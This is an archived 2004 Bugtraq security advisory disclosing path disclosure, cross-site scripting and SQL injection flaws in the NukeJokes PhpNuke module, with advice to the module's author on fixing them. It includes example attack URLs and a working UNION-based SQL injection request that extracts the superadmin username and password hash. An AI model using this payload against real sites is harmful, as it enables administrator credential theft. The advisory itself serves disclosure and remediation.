[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [waraxe-2004-SA#028 - Multiple vulnerabilities in NukeJokes
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-05-08 19:22:17
Message-ID: 20040508192217.6679.qmail () www ! securityfocus ! com
[Download RAW message or body]
{================================================================================}
{ [waraxe-2004-SA#028] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in NukeJokes module for PhpNuke ] }
{ }
{================================================================================}
\
Author: Janek Vind "waraxe"
Date: 08. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=28
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From readme file:
"Nuke jokes is an addon for PHPNuke. It has been tested with PHPNuke 6.0. It should
work with 6.5 and some lower versions but I haven't been able to test it. Nuke Jokes
allows you to have a database of jokes on your website. Jokes are sperated into \
different categories to make them easier to find. It includes the ability to rate \
jokes, shows how many views they've had and other information. Also includes a search \
engine. The admin area allows you to add, edit and delete jokes and categories, \
install and uninstall the database and validate user added jokes."
Author: Adam Webb
Websites:
http://www.funportal.host.sk
http://funportal.beanwebb.com
I have tested two different versions of NukeJokes: v1.7 and 2 Beta. They seems to \
have same security bugs.
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, what to say? I was really surprised, when saw NukeJokes source code - almost \
ALL sql queries are WITHOUT ANY single quotes...
Wide area to practice sql injection attacks. And most user submitted parameters are \
not sanitized at all, so full path disclosure and XSS cases exists there too. In \
fact, NukeJokes has so many bugs, that i'm too lazy to count them all. So i will just \
bring some examples...
A. Full path disclosure:
Examples:
http://localhost/nuke72/modules/NukeJokes/mainfunctions.php
http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=foobar
B. Cross-site scripting aka XSS:
Examples:
http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code \
here]
C. Sql injection:
Example exploiting GET request:
http://localhost/nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SE \
LECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
and we can see superadmin's username and password's md5 hash with ease. Of course, \
mysql has to be 4.x with UNION functionality enabled, to successful exploiting.
Ending words to author(s) - NukeJokes is based on good ideas, but must be rewritten \
in secure way! This is not such big work - just add those single quotes to any sql \
queries and do sanitize variables, passed to script by client browser, to avoid \
cross-site scripting and path disclosure bugs. If you want some advise from me, you \
can always send an email and i will help.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic